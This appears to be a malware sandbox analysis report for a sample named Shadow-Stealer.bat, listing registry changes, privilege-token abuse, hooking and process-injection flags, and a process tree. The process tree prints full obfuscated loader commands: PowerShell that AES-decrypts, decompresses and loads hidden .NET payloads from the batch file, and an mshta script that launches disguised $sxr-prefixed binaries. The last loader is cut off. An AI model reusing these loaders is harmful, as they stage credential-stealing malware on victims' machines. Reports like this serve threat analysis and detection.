| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\NotificationData | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5b0b2b69-7264-4637-9a9f-641bccea46a2}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{90a5ed3d-9d35-4845-ad94-9792d6a8b103}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
